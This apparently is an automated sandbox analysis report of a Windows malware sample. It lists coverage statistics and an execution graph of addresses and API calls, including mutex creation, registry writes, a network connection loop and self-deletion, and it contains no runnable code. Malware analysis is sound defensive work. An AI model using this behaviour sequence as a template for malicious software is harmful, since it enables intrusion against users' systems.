                                                  • Instruction Fuzzy Hash: 9A01D671B0E3854FC72E122D1C305696FBAAFC392532A44EBC080DF297C95A4C45C3A6

                                                  Execution Graph

                                                  Execution Coverage:3.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:5.1%
                                                  Total number of Nodes:1241
                                                  Total number of Limit Nodes:49
                                                  execution_graph 47283 43bea8 47284 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 47283->47284 47285 43bec2 47284->47285 47287 43beec 47284->47287 47299 44062d 20 API calls _Atexit 47285->47299 47294 445909 EnterCriticalSection 47287->47294 47289 43bec7 ___scrt_is_nonwritable_in_current_image ___std_exception_copy 47290 43bef7 47295 43bf98 47290->47295 47294->47290 47297 43bfa6 47295->47297 47296 43bf02 47300 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47296->47300 47297->47296 47301 4497ec 37 API calls 2 library calls 47297->47301 47299->47289 47300->47289 47301->47297 47302 434918 47303 434924 ___scrt_is_nonwritable_in_current_image 47302->47303 47329 434627 47303->47329 47305 43492b 47307 434954 47305->47307 47627 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47305->47627 47315 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47307->47315 47628 4442d2 5 API calls ___crtLCMapStringA 47307->47628 47309 43496d 47310 434973 ___scrt_is_nonwritable_in_current_image 47309->47310 47629 444276 5 API calls ___crtLCMapStringA 47309->47629 47312 4349f3 47340 434ba5 47312->47340 47315->47312 47630 443487 36 API calls 5 library calls 47315->47630 47322 434a15 47323 434a1f 47322->47323 47632 4434bf 28 API calls _Atexit 47322->47632 47324 434a28 47323->47324 47633 443462 28 API calls _Atexit 47323->47633 47634 43479e 13 API calls 2 library calls 47324->47634 47328 434a30 47328->47310 47330 434630 47329->47330 47635 434cb6 IsProcessorFeaturePresent 47330->47635 47332 43463c 47636 438fb1 10 API calls 4 library calls 47332->47636 47334 434641 47339 434645 47334->47339 47637 44415f 47334->47637 47337 43465c 47337->47305 47339->47305 47696 436f10 47340->47696 47343 4349f9 47344 444223 47343->47344 47698 44f0d9 47344->47698 47346 44422c 47347 434a02 47346->47347 47702 446895 36 API calls 47346->47702 47349 40ea00 47347->47349 47704 41cbe1 LoadLibraryA GetProcAddress 47349->47704 47351 40ea1c GetModuleFileNameW 47709 40f3fe 47351->47709 47353 40ea38 47724 4020f6 47353->47724 47356 4020f6 28 API calls 47357 40ea56 47356->47357 47730 41beac 47357->47730 47361 40ea68 47756 401e8d 47361->47756 47363 40ea71 47364 40ea84 47363->47364 47365 40eace 47363->47365 48023 40fbee 118 API calls 47364->48023 47762 401e65 47365->47762 47368 40eade 47372 401e65 22 API calls 47368->47372 47369 40ea96 47370 401e65 22 API calls 47369->47370 47371 40eaa2 47370->47371 48024 410f72 36 API calls __EH_prolog 47371->48024 47373 40eafd 47372->47373 47767 40531e 47373->47767 47376 40eb0c 47772 406383 47376->47772 47377 40eab4 48025 40fb9f 78 API calls 47377->48025 47381 40eabd 48026 40f3eb 71 API calls 47381->48026 47387 401fd8 11 API calls 47388 40ef36 47387->47388 47631 443396 GetModuleHandleW 47388->47631 47389 401fd8 11 API calls 47390 40eb36 47389->47390 47391 401e65 22 API calls 47390->47391 47392 40eb3f 47391->47392 47789 401fc0 47392->47789 47394 40eb4a 47395 401e65 22 API calls 47394->47395 47396 40eb63 47395->47396 47397 401e65 22 API calls 47396->47397 47398 40eb7e 47397->47398 47399 40ebe9 47398->47399 48027 406c59 47398->48027 47400 401e65 22 API calls 47399->47400 47406 40ebf6 47400->47406 47402 40ebab 47403 401fe2 28 API calls 47402->47403 47404 40ebb7 47403->47404 47405 401fd8 11 API calls 47404->47405 47408 40ebc0 47405->47408 47407 40ec3d 47406->47407 47411 413584 3 API calls 47406->47411 47793 40d0a4 47407->47793 48032 413584 RegOpenKeyExA 47408->48032 47410 40ec43 47412 40eac6 47410->47412 47796 41b354 47410->47796 47418 40ec21 47411->47418 47412->47387 47416 40ec5e 47419 40ecb1 47416->47419 47813 407751 47416->47813 47417 40f38a 48113 4139e4 30 API calls 47417->48113 47418->47407 48035 4139e4 30 API calls 47418->48035 47421 401e65 22 API calls 47419->47421 47424 40ecba 47421->47424 47434 40ecc6 47424->47434 47435 40eccb 47424->47435 47426 40f3a0 48114 4124b0 65 API calls ___scrt_fastfail 47426->48114 47427 40ec87 47431 401e65 22 API calls 47427->47431 47428 40ec7d 48036 407773 30 API calls 47428->48036 47443 40ec90 47431->47443 47432 40f3aa 47433 41bcef 28 API calls 47432->47433 47437 40f3ba 47433->47437 48039 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47434->48039 47440 401e65 22 API calls 47435->47440 47436 40ec82 48037 40729b 98 API calls 47436->48037 47922 413a5e RegOpenKeyExW 47437->47922 47441 40ecd4 47440->47441 47817 41bcef 47441->47817 47443->47419 47447 40ecac 47443->47447 47444 40ecdf 47821 401f13 47444->47821 48038 40729b 98 API calls 47447->48038 47451 401f09 11 API calls 47453 40f3d7 47451->47453 47455 401f09 11 API calls 47453->47455 47457 40f3e0 47455->47457 47456 401e65 22 API calls 47458 40ecfc 47456->47458 47925 40dd7d 47457->47925 47462 401e65 22 API calls 47458->47462 47464 40ed16 47462->47464 47463 40f3ea 47465 401e65 22 API calls 47464->47465 47466 40ed30 47465->47466 47467 401e65 22 API calls 47466->47467 47468 40ed49 47467->47468 47469 40edb6 47468->47469 47470 401e65 22 API calls 47468->47470 47471 40edc5 47469->47471 47477 40ef41 ___scrt_fastfail 47469->47477 47475 40ed5e _wcslen 47470->47475 47472 40edce 47471->47472 47499 40ee4a ___scrt_fastfail 47471->47499 47473 401e65 22 API calls 47472->47473 47474 40edd7 47473->47474 47476 401e65 22 API calls 47474->47476 47475->47469 47479 401e65 22 API calls 47475->47479 47478 40ede9 47476->47478 48100 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47477->48100 47482 401e65 22 API calls 47478->47482 47480 40ed79 47479->47480 47483 401e65 22 API calls 47480->47483 47484 40edfb 47482->47484 47485 40ed8e 47483->47485 47487 401e65 22 API calls 47484->47487 48040 40da6f 47485->48040 47486 40ef8c 47488 401e65 22 API calls 47486->47488 47491 40ee24 47487->47491 47489 40efb1 47488->47489 47843 402093 47489->47843 47496 401e65 22 API calls 47491->47496 47493 401f13 28 API calls 47495 40edad 47493->47495 47500 401f09 11 API calls 47495->47500 47497 40ee35 47496->47497 48098 40ce34 45 API calls _wcslen 47497->48098 47498 40efc3 47849 4137aa RegCreateKeyA 47498->47849 47833 413982 47499->47833 47500->47469 47504 40ee45 47504->47499 47506 40eede ctype 47509 401e65 22 API calls 47506->47509 47507 401e65 22 API calls 47508 40efe5 47507->47508 47855 43bb2c 47508->47855 47510 40eef5 47509->47510 47510->47486 47513 40ef09 47510->47513 47516 401e65 22 API calls 47513->47516 47514 40effc 48101 41ce2c 87 API calls ___scrt_fastfail 47514->48101 47515 40f01f 47520 402093 28 API calls 47515->47520 47518 40ef12 47516->47518 47521 41bcef 28 API calls 47518->47521 47519 40f003 CreateThread 47519->47515 48857 41d4ee 10 API calls 47519->48857 47522 40f034 47520->47522 47523 40ef1e 47521->47523 47524 402093 28 API calls 47522->47524 48099 40f4af 104 API calls 47523->48099 47526 40f043 47524->47526 47859 41b580 47526->47859 47527 40ef23 47527->47486 47529 40ef2a 47527->47529 47529->47412 47531 401e65 22 API calls 47532 40f054 47531->47532 47533 401e65 22 API calls 47532->47533 47534 40f066 47533->47534 47535 401e65 22 API calls 47534->47535 47536 40f086 47535->47536 47537 43bb2c _strftime 40 API calls 47536->47537 47538 40f093 47537->47538 47539 401e65 22 API calls 47538->47539 47540 40f09e 47539->47540 47541 401e65 22 API calls 47540->47541 47542 40f0af 47541->47542 47543 401e65 22 API calls 47542->47543 47544 40f0c4 47543->47544 47545 401e65 22 API calls 47544->47545 47546 40f0d5 47545->47546 47547 40f0dc StrToIntA 47546->47547 47883 409e1f 47547->47883 47550 401e65 22 API calls 47551 40f0f7 47550->47551 47552 40f103 47551->47552 47553 40f13c 47551->47553 48102 43455e 47552->48102 47556 401e65 22 API calls 47553->47556 47558 40f14c 47556->47558 47557 401e65 22 API calls 47559 40f11f 47557->47559 47561 40f194 47558->47561 47562 40f158 47558->47562 47560 40f126 CreateThread 47559->47560 47560->47553 48855 41a045 103 API calls 2 library calls 47560->48855 47563 401e65 22 API calls 47561->47563 47564 43455e new 22 API calls 47562->47564 47566 40f19d 47563->47566 47565 40f161 47564->47565 47567 401e65 22 API calls 47565->47567 47569 40f207 47566->47569 47570 40f1a9 47566->47570 47568 40f173 47567->47568 47571 40f17a CreateThread 47568->47571 47572 401e65 22 API calls 47569->47572 47573 401e65 22 API calls 47570->47573 47571->47561 48854 41a045 103 API calls 2 library calls 47571->48854 47574 40f210 47572->47574 47575 40f1b9 47573->47575 47576 40f255 47574->47576 47577 40f21c 47574->47577 47578 401e65 22 API calls 47575->47578 47908 41b69e GetComputerNameExW GetUserNameW 47576->47908 47581 401e65 22 API calls 47577->47581 47579 40f1ce 47578->47579 48109 40da23 31 API calls 47579->48109 47582 40f225 47581->47582 47587 401e65 22 API calls 47582->47587 47584 401f13 28 API calls 47586 40f269 47584->47586 47589 401f09 11 API calls 47586->47589 47591 40f23a 47587->47591 47588 40f1e1 47592 401f13 28 API calls 47588->47592 47590 40f272 47589->47590 47593 40f27b SetProcessDEPPolicy 47590->47593 47594 40f27e CreateThread 47590->47594 47601 43bb2c _strftime 40 API calls 47591->47601 47595 40f1ed 47592->47595 47593->47594 47596 40f293 CreateThread 47594->47596 47597 40f29f 47594->47597 48825 40f7e2 47594->48825 47598 401f09 11 API calls 47595->47598 47596->47597 48856 412132 138 API calls 47596->48856 47599 40f2b4 47597->47599 47600 40f2a8 CreateThread 47597->47600 47602 40f1f6 CreateThread 47598->47602 47604 40f307 47599->47604 47606 402093 28 API calls 47599->47606 47600->47599 48852 412716 38 API calls ___scrt_fastfail 47600->48852 47603 40f247 47601->47603 47602->47569 48853 401be9 50 API calls _strftime 47602->48853 48110 40c19d 7 API calls 47603->48110 47919 41353a RegOpenKeyExA 47604->47919 47607 40f2d7 47606->47607 48111 4052fd 28 API calls 47607->48111 47612 40f328 47615 41bcef 28 API calls 47612->47615 47617 40f338 47615->47617 48112 413656 31 API calls 47617->48112 47621 40f34e 47622 401f09 11 API calls 47621->47622 47625 40f359 47622->47625 47623 40f381 DeleteFileW 47624 40f388 47623->47624 47623->47625 47624->47432 47625->47432 47625->47623 47626 40f36f Sleep 47625->47626 47626->47625 47627->47305 47628->47309 47629->47315 47630->47312 47631->47322 47632->47323 47633->47324 47634->47328 47635->47332 47636->47334 47641 44fbe8 47637->47641 47640 438fda 8 API calls 3 library calls 47640->47339 47642 44fc05 47641->47642 47643 44fc01 47641->47643 47642->47643 47647 449d26 47642->47647 47659 43502b 5 API calls ___raise_securityfailure 47643->47659 47645 43464e 47645->47337 47645->47640 47648 449d32 ___scrt_is_nonwritable_in_current_image 47647->47648 47660 445909 EnterCriticalSection 47648->47660 47650 449d39 47661 450203 47650->47661 47652 449d48 47653 449d57 47652->47653 47672 449bba 23 API calls 47652->47672 47674 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47653->47674 47656 449d68 ___scrt_is_nonwritable_in_current_image 47656->47642 47657 449d52 47673 449c70 GetStdHandle GetFileType 47657->47673 47659->47645 47660->47650 47662 45020f ___scrt_is_nonwritable_in_current_image 47661->47662 47663 450233 47662->47663 47664 45021c 47662->47664 47675 445909 EnterCriticalSection 47663->47675 47683 44062d 20 API calls _Atexit 47664->47683 47667 45026b 47684 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47667->47684 47668 45023f 47668->47667 47676 450154 47668->47676 47670 450221 ___scrt_is_nonwritable_in_current_image ___std_exception_copy 47670->47652 47672->47657 47673->47653 47674->47656 47675->47668 47685 445b74 47676->47685 47678 450173 47693 446802 20 API calls _free 47678->47693 47679 450166 47679->47678 47692 448b04 11 API calls 2 library calls 47679->47692 47681 4501c5 47681->47668 47683->47670 47684->47670 47690 445b81 ___crtLCMapStringA 47685->47690 47686 445bc1 47695 44062d 20 API calls _Atexit 47686->47695 47687 445bac RtlAllocateHeap 47688 445bbf 47687->47688 47687->47690 47688->47679 47690->47686 47690->47687 47694 443001 7 API calls 2 library calls 47690->47694 47692->47679 47693->47681 47694->47690 47695->47688 47697 434bb8 GetStartupInfoW 47696->47697 47697->47343 47699 44f0eb 47698->47699 47700 44f0e2 47698->47700 47699->47346 47703 44efd8 49 API calls 4 library calls 47700->47703 47702->47346 47703->47699 47705 41cc20 LoadLibraryA GetProcAddress 47704->47705 47706 41cc10 GetModuleHandleA GetProcAddress 47704->47706 47707 41cc49 44 API calls 47705->47707 47708 41cc39 LoadLibraryA GetProcAddress 47705->47708 47706->47705 47707->47351 47708->47707 48115 41b539 FindResourceA 47709->48115 47713 40f428 ctype 48125 4020b7 47713->48125 47716 401fe2 28 API calls 47717 40f44e 47716->47717 47718 401fd8 11 API calls 47717->47718 47719 40f457 47718->47719 47720 43bda0 _Yarn 21 API calls 47719->47720 47721 40f468 ctype 47720->47721 48131 406e13 47721->48131 47723 40f49b 47723->47353 47725 40210c 47724->47725 47726 4023ce 11 API calls 47725->47726 47727 402126 47726->47727 47728 402569 28 API calls 47727->47728 47729 402134 47728->47729 47729->47356 48185 4020df 47730->48185 47732 41bf2f 47733 401fd8 11 API calls 47732->47733 47734 41bf61 47733->47734 47736 401fd8 11 API calls 47734->47736 47735 41bf31 48201 4041a2 28 API calls 47735->48201 47738 41bf69 47736->47738 47741 401fd8 11 API calls 47738->47741 47740 41bf3d 47742 401fe2 28 API calls 47740->47742 47744 40ea5f 47741->47744 47745 41bf46 47742->47745 47743 401fe2 28 API calls 47751 41bebf 47743->47751 47752 40fb52 47744->47752 47746 401fd8 11 API calls 47745->47746 47748 41bf4e 47746->47748 47747 401fd8 11 API calls 47747->47751 47749 41cec5 28 API calls 47748->47749 47749->47732 47751->47732 47751->47735 47751->47743 47751->47747 48189 4041a2 28 API calls 47751->48189 48190 41cec5 47751->48190 47753 40fb5e 47752->47753 47755 40fb65 47752->47755 48216 402163 11 API calls 47753->48216 47755->47361 47757 402163 47756->47757 47761 40219f 47757->47761 48217 402730 11 API calls 47757->48217 47759 402184 48218 402712 11 API calls std::_Deallocate 47759->48218 47761->47363 47763 401e6d 47762->47763 47765 401e75 47763->47765 48219 402158 22 API calls 47763->48219 47765->47368 47768 4020df 11 API calls 47767->47768 47769 40532a 47768->47769 48220 4032a0 47769->48220 47771 405346 47771->47376 48224 4051ef 47772->48224 47774 406391 48228 402055 47774->48228 47777 401fe2 47778 401ff1 47777->47778 47785 402039 47777->47785 47779 4023ce 11 API calls 47778->47779 47780 401ffa 47779->47780 47781 402015 47780->47781 47782 40203c 47780->47782 48260 403098 28 API calls 47781->48260 47783 40267a 11 API calls 47782->47783 47783->47785 47786 401fd8 47785->47786 47787 4023ce 11 API calls 47786->47787 47788 401fe1 47787->47788 47788->47389 47790 401fd2 47789->47790 47791 401fc9 47789->47791 47790->47394 48261 4025e0 28 API calls 47791->48261 48262 401fab 47793->48262 47795 40d0ae CreateMutexA GetLastError 47795->47410 48263 41c048 47796->48263 47801 401fe2 28 API calls 47802 41b390 47801->47802 47803 401fd8 11 API calls 47802->47803 47804 41b398 47803->47804 47805 4135e1 31 API calls 47804->47805 47807 41b3ee 47804->47807 47806 41b3c1 47805->47806 47808 41b3cc StrToIntA 47806->47808 47807->47416 47809 41b3e3 47808->47809 47810 41b3da 47808->47810 47811 401fd8 11 API calls 47809->47811 48271 41cffa 22 API calls 47810->48271 47811->47807 47814 407765 47813->47814 47815 413584 3 API calls 47814->47815 47816 40776c 47815->47816 47816->47427 47816->47428 47818 41bd03 47817->47818 48272 40b93f 47818->48272 47820 41bd0b 47820->47444 47822 401f22 47821->47822 47829 401f6a 47821->47829 47823 402252 11 API calls 47822->47823 47824 401f2b 47823->47824 47825 401f6d 47824->47825 47827 401f46 47824->47827 48305 402336 47825->48305 48304 40305c 28 API calls 47827->48304 47830 401f09 47829->47830 47831 402252 11 API calls 47830->47831 47832 401f12 47831->47832 47832->47456 47834 4139a0 47833->47834 47835 406e13 28 API calls 47834->47835 47836 4139b5 47835->47836 47837 4020f6 28 API calls 47836->47837 47838 4139c5 47837->47838 47839 4137aa 14 API calls 47838->47839 47840 4139cf 47839->47840 47841 401fd8 11 API calls 47840->47841 47842 4139dc 47841->47842 47842->47506 47844 40209b 47843->47844 47845 4023ce 11 API calls 47844->47845 47846 4020a6 47845->47846 48309 4024ed 47846->48309 47850 4137fa 47849->47850 47852 4137c3 47849->47852 47851 401fd8 11 API calls 47850->47851 47853 40efd9 47851->47853 47854 4137d5 RegSetValueExA RegCloseKey 47852->47854 47853->47507 47854->47850 47856 43bb45 _strftime 47855->47856 48313 43ae83 47856->48313 47858 40eff2 47858->47514 47858->47515 47860 41b631 47859->47860 47861 41b596 GetLocalTime 47859->47861 47862 401fd8 11 API calls 47860->47862 47863 40531e 28 API calls 47861->47863 47864 41b639 47862->47864 47865 41b5d8 47863->47865 47866 401fd8 11 API calls 47864->47866 47867 406383 28 API calls 47865->47867 47868 40f048 47866->47868 47869 41b5e4 47867->47869 47868->47531 48341 402f10 47869->48341 47872 406383 28 API calls 47873 41b5fc 47872->47873 48346 40723b 77 API calls 47873->48346 47875 41b60a 47876 401fd8 11 API calls 47875->47876 47877 41b616 47876->47877 47878 401fd8 11 API calls 47877->47878 47879 41b61f 47878->47879 47880 401fd8 11 API calls 47879->47880 47881 41b628 47880->47881 47882 401fd8 11 API calls 47881->47882 47882->47860 47884 409e3d _wcslen 47883->47884 47885 409e48 47884->47885 47886 409e5f 47884->47886 47887 40da6f 31 API calls 47885->47887 47888 40da6f 31 API calls 47886->47888 47890 409e50 47887->47890 47889 409e67 47888->47889 47891 401f13 28 API calls 47889->47891 47892 401f13 28 API calls 47890->47892 47893 409e75 47891->47893 47894 409e5a 47892->47894 47895 401f09 11 API calls 47893->47895 47897 401f09 11 API calls 47894->47897 47896 409e7d 47895->47896 48365 409196 28 API calls 47896->48365 47899 409eb4 47897->47899 48350 40a144 47899->48350 47901 409e8f 48366 403014 47901->48366 47905 401f13 28 API calls 47906 409ea4 47905->47906 47907 401f09 11 API calls 47906->47907 47907->47894 48558 40417e 47908->48558 47913 403014 28 API calls 47914 41b703 47913->47914 47915 401f09 11 API calls 47914->47915 47916 41b70c 47915->47916 47917 401f09 11 API calls 47916->47917 47918 40f25e 47917->47918 47918->47584 47920 41355b RegQueryValueExA RegCloseKey 47919->47920 47921 40f31f 47919->47921 47920->47921 47921->47457 47921->47612 47923 413a7a RegDeleteValueW 47922->47923 47924 40f3cd 47922->47924 47923->47924 47924->47451 47926 40dd96 47925->47926 47927 41353a 3 API calls 47926->47927 47928 40dd9d 47927->47928 47929 40ddbc 47928->47929 48652 401707 47928->48652 47933 414f65 47929->47933 47931 40ddaa 48655 4138b2 RegCreateKeyA 47931->48655 47934 4020df 11 API calls 47933->47934 47935 414f79 47934->47935 48669 41b944 47935->48669 47938 4020df 11 API calls 47939 414f8f 47938->47939 47940 401e65 22 API calls 47939->47940 47941 414f9d 47940->47941 47942 43bb2c _strftime 40 API calls 47941->47942 47943 414faa 47942->47943 47944 414fbc 47943->47944 47945 414faf Sleep 47943->47945 47946 402093 28 API calls 47944->47946 47945->47944 47947 414fcb 47946->47947 47948 401e65 22 API calls 47947->47948 47949 414fd4 47948->47949 47950 4020f6 28 API calls 47949->47950 47951 414fdf 47950->47951 47952 41beac 28 API calls 47951->47952 47953 414fe7 47952->47953 48673 40489e WSAStartup 47953->48673 47955 414ff1 47956 401e65 22 API calls 47955->47956 47957 414ffa 47956->47957 47958 401e65 22 API calls 47957->47958 47983 415079 47957->47983 47959 415013 47958->47959 47960 401e65 22 API calls 47959->47960 47961 415024 47960->47961 47964 401e65 22 API calls 47961->47964 47962 41beac 28 API calls 47962->47983 47963 401e65 22 API calls 47963->47983 47965 415035 47964->47965 47966 401e65 22 API calls 47965->47966 47968 415046 47966->47968 47967 406c59 28 API calls 47967->47983 47969 401e65 22 API calls 47968->47969 47971 415057 47969->47971 47970 401fe2 28 API calls 47970->47983 47972 401e65 22 API calls 47971->47972 47973 415069 47972->47973 48775 40473d 89 API calls 47973->48775 47975 402093 28 API calls 47975->47983 47976 41b580 80 API calls 47976->47983 47978 4151c7 WSAGetLastError 48776 41cb72 30 API calls 47978->48776 47983->47962 47983->47963 47983->47967 47983->47970 47983->47975 47983->47976 47983->47978 47986 40531e 28 API calls 47983->47986 47987 401e8d 11 API calls 47983->47987 47988 402f10 28 API calls 47983->47988 47989 43bb2c _strftime 40 API calls 47983->47989 47991 406383 28 API calls 47983->47991 47992 401fd8 11 API calls 47983->47992 47994 409097 28 API calls 47983->47994 47996 4020f6 28 API calls 47983->47996 47998 4135e1 31 API calls 47983->47998 48002 4153f6 47983->48002 48674 414f24 47983->48674 48679 40482d 47983->48679 48686 404f51 47983->48686 48701 4048c8 connect 47983->48701 48761 404e26 WaitForSingleObject 47983->48761 48777 4052fd 28 API calls 47983->48777 48778 4145f8 51 API calls 47983->48778 48779 441ed1 20 API calls 47983->48779 48780 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47983->48780 47986->47983 47987->47983 47988->47983 47990 415b0a Sleep 47989->47990 47990->47983 47991->47983 47992->47983 47994->47983 47996->47983 47998->47983 47999 40417e 28 API calls 47999->48002 48002->47983 48002->47999 48003 401e65 22 API calls 48002->48003 48007 41bc1f 28 API calls 48002->48007 48009 41bdaf 28 API calls 48002->48009 48012 406383 28 API calls 48002->48012 48013 402f10 28 API calls 48002->48013 48014 402ea1 28 API calls 48002->48014 48016 401fd8 11 API calls 48002->48016 48017 401f09 11 API calls 48002->48017 48020 402093 28 API calls 48002->48020 48021 41b580 80 API calls 48002->48021 48022 415aac CreateThread 48002->48022 48781 40ddc4 6 API calls 48002->48781 48782 41bcd3 28 API calls 48002->48782 48784 41bb77 GetTickCount 48002->48784 48785 41bb27 30 API calls ___scrt_fastfail 48002->48785 48786 40f90c 29 API calls 48002->48786 48787 402f31 28 API calls 48002->48787 48788 404aa1 61 API calls ctype 48002->48788 48789 404c10 113 API calls _Yarn 48002->48789 48790 40b08c 85 API calls 48002->48790 48004 415474 GetTickCount 48003->48004 48783 41bc1f 28 API calls 48004->48783 48007->48002 48009->48002 48012->48002 48013->48002 48014->48002 48016->48002 48017->48002 48020->48002 48021->48002 48022->48002 48815 41ada8 105 API calls 48022->48815 48023->47369 48024->47377 48025->47381 48028 4020df 11 API calls 48027->48028 48029 406c65 48028->48029 48030 4032a0 28 API calls 48029->48030 48031 406c82 48030->48031 48031->47402 48033 40ebdf 48032->48033 48034 4135ae RegQueryValueExA RegCloseKey 48032->48034 48033->47399 48033->47417 48034->48033 48035->47407 48036->47436 48037->47427 48038->47419 48039->47435 48041 401f86 11 API calls 48040->48041 48042 40da8b 48041->48042 48043 40dae0 48042->48043 48044 40daab 48042->48044 48045 40daa1 48042->48045 48048 41c048 GetCurrentProcess 48043->48048 48816 41b645 29 API calls 48044->48816 48047 40dbd4 GetLongPathNameW 48045->48047 48051 40417e 28 API calls 48047->48051 48049 40dae5 48048->48049 48052 40dae9 48049->48052 48053 40db3b 48049->48053 48050 40dab4 48054 401f13 28 API calls 48050->48054 48055 40dbe9 48051->48055 48057 40417e 28 API calls 48052->48057 48056 40417e 28 API calls 48053->48056 48093 40dabe 48054->48093 48058 40417e 28 API calls 48055->48058 48060 40db49 48056->48060 48061 40daf7 48057->48061 48059 40dbf8 48058->48059 48819 40de0c 28 API calls 48059->48819 48066 40417e 28 API calls 48060->48066 48067 40417e 28 API calls 48061->48067 48063 401f09 11 API calls 48063->48045 48064 40dc0b 48820 402fa5 28 API calls 48064->48820 48069 40db5f 48066->48069 48070 40db0d 48067->48070 48068 40dc16 48821 402fa5 28 API calls 48068->48821 48818 402fa5 28 API calls 48069->48818 48817 402fa5 28 API calls 48070->48817 48074 40dc20 48077 401f09 11 API calls 48074->48077 48075 40db6a 48078 401f13 28 API calls 48075->48078 48076 40db18 48079 401f13 28 API calls 48076->48079 48080 40dc2a 48077->48080 48081 40db75 48078->48081 48082 40db23 48079->48082 48083 401f09 11 API calls 48080->48083 48084 401f09 11 API calls 48081->48084 48085 401f09 11 API calls 48082->48085 48086 40dc33 48083->48086 48087 40db7e 48084->48087 48088 40db2c 48085->48088 48089 401f09 11 API calls 48086->48089 48090 401f09 11 API calls 48087->48090 48091 401f09 11 API calls 48088->48091 48092 40dc3c 48089->48092 48090->48093 48091->48093 48094 401f09 11 API calls 48092->48094 48093->48063 48095 40dc45 48094->48095 48096 401f09 11 API calls 48095->48096 48097 40dc4e 48096->48097 48097->47493 48098->47504 48099->47527 48100->47486 48101->47519 48104 434563 48102->48104 48103 43bda0 _Yarn 21 API calls 48103->48104 48104->48103 48105 40f10c 48104->48105 48822 443001 7 API calls 2 library calls 48104->48822 48823 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48104->48823 48824 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48104->48824 48105->47557 48109->47588 48110->47576 48112->47621 48113->47426 48116 41b556 LoadResource LockResource SizeofResource 48115->48116 48117 40f419 48115->48117 48116->48117 48118 43bda0 48117->48118 48123 4461b8 ___crtLCMapStringA 48118->48123 48119 4461f6 48135 44062d 20 API calls _Atexit 48119->48135 48121 4461e1 RtlAllocateHeap 48122 4461f4 48121->48122 48121->48123 48122->47713 48123->48119 48123->48121 48134 443001 7 API calls 2 library calls 48123->48134 48126 4020bf 48125->48126 48136 4023ce 48126->48136 48128 4020ca 48140 40250a 48128->48140 48130 4020d9 48130->47716 48132 4020b7 28 API calls 48131->48132 48133 406e27 48132->48133 48133->47723 48134->48123 48135->48122 48137 402428 48136->48137 48138 4023d8 48136->48138 48137->48128 48138->48137 48147 4027a7 11 API calls std::_Deallocate 48138->48147 48141 40251a 48140->48141 48142 402520 48141->48142 48143 402535 48141->48143 48148 402569 48142->48148 48158 4028e8 48143->48158 48146 402533 48146->48130 48147->48137 48169 402888 48148->48169 48150 40257d 48151 402592 48150->48151 48152 4025a7 48150->48152 48174 402a34 22 API calls 48151->48174 48154 4028e8 28 API calls 48152->48154 48157 4025a5 48154->48157 48155 40259b 48175 4029da 22 API calls 48155->48175 48157->48146 48159 4028f1 48158->48159 48160 402953 48159->48160 48161 4028fb 48159->48161 48183 4028a4 22 API calls 48160->48183 48165 402904 48161->48165 48166 402917 48161->48166 48164 402915 48164->48146 48177 402cae 48165->48177 48166->48164 48168 4023ce 11 API calls 48166->48168 48168->48164 48170 402890 48169->48170 48171 402898 48170->48171 48176 402ca3 22 API calls 48170->48176 48171->48150 48174->48155 48175->48157 48178 402cb8 __EH_prolog 48177->48178 48184 402e54 22 API calls 48178->48184 48180 4023ce 11 API calls 48181 402d92 48180->48181 48181->48164 48182 402d24 48182->48180 48184->48182 48186 4020e7 48185->48186 48187 4023ce 11 API calls 48186->48187 48188 4020f2 48187->48188 48188->47751 48189->47751 48191 41ced2 48190->48191 48192 41cf31 48191->48192 48196 41cee2 48191->48196 48193 41cf4b 48192->48193 48207 41d071 28 API calls 48192->48207 48195 41d1d7 28 API calls 48193->48195 48198 41cf2d 48195->48198 48197 41cf1a 48196->48197 48202 41d071 28 API calls 48196->48202 48203 41d1d7 48197->48203 48198->47751 48201->47740 48202->48197 48204 41d1e0 48203->48204 48208 41d283 48204->48208 48207->48193 48209 41d28c 48208->48209 48212 41d331 48209->48212 48214 41d33c 48212->48214 48213 41d1ea 48213->48198 48214->48213 48215 4020f6 28 API calls 48214->48215 48215->48213 48216->47755 48217->47759 48218->47761 48222 4032aa 48220->48222 48221 4032c9 48221->47771 48222->48221 48223 4028e8 28 API calls 48222->48223 48223->48221 48225 4051fb 48224->48225 48234 405274 48225->48234 48227 405208 48227->47774 48229 402061 48228->48229 48230 4023ce 11 API calls 48229->48230 48231 40207b 48230->48231 48256 40267a 48231->48256 48235 405282 48234->48235 48236 405288 48235->48236 48237 40529e 48235->48237 48245 4025f0 48236->48245 48239 4052f5 48237->48239 48240 4052b6 48237->48240 48254 4028a4 22 API calls 48239->48254 48243 4028e8 28 API calls 48240->48243 48244 40529c 48240->48244 48243->48244 48244->48227 48246 402888 22 API calls 48245->48246 48247 402602 48246->48247 48248 402672 48247->48248 48249 402629 48247->48249 48255 4028a4 22 API calls 48248->48255 48252 4028e8 28 API calls 48249->48252 48253 40263b 48249->48253 48252->48253 48253->48244 48257 40268b 48256->48257 48258 4023ce 11 API calls 48257->48258 48259 40208d 48258->48259 48259->47777 48260->47785 48261->47790 48264 41b362 48263->48264 48265 41c055 GetCurrentProcess 48263->48265 48266 4135e1 RegOpenKeyExA 48264->48266 48265->48264 48267 41360f RegQueryValueExA RegCloseKey 48266->48267 48268 413639 48266->48268 48267->48268 48269 402093 28 API calls 48268->48269 48270 41364e 48269->48270 48270->47801 48271->47809 48273 40b947 48272->48273 48278 402252 48273->48278 48275 40b952 48282 40b967 48275->48282 48277 40b961 48277->47820 48279 4022ac 48278->48279 48280 40225c 48278->48280 48279->48275 48280->48279 48289 402779 11 API calls std::_Deallocate 48280->48289 48283 40b9a1 48282->48283 48284 40b973 48282->48284 48301 4028a4 22 API calls 48283->48301 48290 4027e6 48284->48290 48288 40b97d 48288->48277 48289->48279 48291 4027ef 48290->48291 48292 402851 48291->48292 48293 4027f9 48291->48293 48303 4028a4 22 API calls 48292->48303 48296 402802 48293->48296 48298 402815 48293->48298 48302 402aea 28 API calls __EH_prolog 48296->48302 48299 402813 48298->48299 48300 402252 